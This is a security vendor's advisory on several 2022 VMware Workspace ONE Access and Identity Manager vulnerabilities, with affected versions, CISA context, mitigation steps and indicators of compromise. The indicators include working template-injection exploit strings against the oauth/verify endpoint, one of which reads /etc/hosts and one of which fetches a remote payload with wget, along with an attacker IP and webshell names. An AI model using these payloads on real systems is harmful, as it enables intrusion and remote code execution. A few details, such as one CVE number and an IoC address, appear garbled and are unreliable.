Urgent Vulnerability Notice: VMware Vulnerabilities Found in Multiple Products

What You Need to Know:

Today, VMware issued patches for two security flaws discovered in Workspace ONE Access, Identity Manager, and vRealize Automation. The vulnerabilities are tracked as CVE-2022-22972 and CVE-2022-22973 and could be exploited to backdoor enterprise networks.

The first vulnerability, CVE-2022-22972 has a critical CVSS score of 9.8 and is an authentication bypass vulnerability that could allow threat actors who have network access to the UI, to gain unauthenticated administrative access. The second vulnerability, CVE-2022-22973 has a CVSS score of 7.8 and is a local privilege escalation vulnerability that could allow a threat actor with local access to gain elevated privileges to the “root” user on virtual appliances. The products impacted include NSX, vRealize Operations, vRealize Log Insight, and vRealize Network Insight.

VMware stated that only customers who have deployed a listed product are affected, including products and suites that offer VMware Identity Manager components as an optional installation. If your organization implements change management using the ITIL definitions of change types, you should consider these vulnerabilities an emergency.

CVE-2022-22972 and CVE-2022-22973 affect the following products/versions:

• VMware Workspace ONE Access Appliance – 21.08.0.1
• VMware Workspace ONE Access Appliance – 21.08.0.0
• VMware Workspace ONE Access Appliance  – 20.10.0.1
• VMware Workspace ONE Access Appliance – 20.10.0.0
• VMware Identity Manager Appliance – 3.3.6
• VMware Identity Manager Appliance – 3.3.5
• VMware Identity Manager Appliance – 3.3.4
• VMware Identity Manager Appliance – 3.3.3

CISA Warns of Previous VMware Vulnerabilities

In April 2022, VMware had two other flaws tracked as CVE-2022-22954 and CVE-2022-22960 that were being exploited by APT groups. According to CISA, the flaws involved threat actors chaining unpatched VMware vulnerabilities for full system control and reverse engineering the updates to develop an exploit within 48 hours. The threat actors also exploited disclosed vulnerabilities in unpatched devices.

The vulnerabilities affect versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. The flaws have since been fixed by VMware, however, CISA stated that due to previous activity, they expect for attackers to quickly develop the capability to exploit the newest VMware vulnerabilities (CVE-2022-22972 and CVE-2022-22973) as well.

CVE-2022-22954 affects the following products/versions:

• VMware Workspace ONE Access – 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
• vIDM – 3.3.6, 3.3.5, 3.3.4, 3.3.3
• VMware Cloud Foundation – 4.x
• vRealize Suite LifeCycle Manager –  8.

CVE-2022-22960 affects the following products:

• VMware Workspace ONE Access –  21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
• vIDM – 3.3.6, 3.3.5, 3.3.4, 3.3.3
• vRA – 7.6
• VMware Cloud Foundation, 3.x, 4.x,
• vRealize Suite LifeCycle Manager, 8.x

According to an incident report published by the IT security company, Barracuda Networks, there have been probing attempts in the wild for CVE-2022-22954 and CVE-2022-2296. Some of the attempts include botnet operators and threat actors leveraging flaws, deploying variants of the Mirai botnet. If your organization is affected by these vulnerabilities, it is highly recommended that you patch immediately.

Towerwall Recommendations:

Towerwall and VMware recommend the following for CVE-2022-22972 and CVE-2022-22973:

• In addition to the most recent updates, you can find mitigation directions for CVE-2022-22972 and CVE-2022-22973 here.

Towerwall and CISA recommend the following for CVE-2022-22954 and CVE-2022-22960:

• Administrators should conduct behavioral analysis on root accounts of vulnerable systems by:
• Using the indicators listed in table 1 to detect potential malicious activity.
• Reviewing systems logs and gaps in logs.
• Reviewing abnormal connections to other assets.
• Searching the command-line history.
• Auditing running processes.
• Reviewing local user accounts and groups.
• Auditing active listening ports and connections.
• In addition to the most recent updates, you can find mitigation directions for CVE-2022-22954 and CVE-2022-22960 here.

Indicators of Compromise (IoCs):

CVE-2022-22972 & CVE-2022-22973

• dingo_jspy_webshell
• http://20.10.0[.0]

CVE-2022-22954 & CVE-2022-22960

• IP Address
  • 136.243.75[.]136
• Scanning, Exploitation Strings, and Commands
  • catalog-portal/ui/oauth/verify
  • portal/ui/oauth/verify?error=&deviceUdid=${“freemarker.template.utility.Execute”?new()(“cat  /etc/hosts”)}
  • /catalog
  • portal/ui/oauth/verify?error=&deviceUdid=${“freemarker.template.utility.Execute”?new()(“wget  -U “Hello 1.0″ -qO – http://[REDACTED]/one”)}
  • freemarker.template.utility[.Execute]
  • /opt/vmware/certproxy/bing/certproxyService.sh
  • /horizon/scripts/exportCustomGroupUsers.sh
  • /horizon/scripts/extractUserIdFromDatabase.sh
• Files
  • Horizon[.jsp]
  • Jquery[.jsp]
• Webshells
  • Jspy
  • godzilla
  • tomcatjsp

Supporting Documentation:

• VMSA-2022-0014: Questions & Answers | VMware
• VMware Releases Patches for New Vulnerabilities Affecting Multiple Products (thehackernews.com)
• VMSA-2022-0014 (vmware.com)
• Emergency Directive 22-03 | CISA
• CISA Issues Emergency Directive and Releases Advisory Related to VMware Vulnerabilities | CISA
• Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control | CISA

If you have any questions about this vulnerability or your information security needs, please contact me directly at 774-204-0700.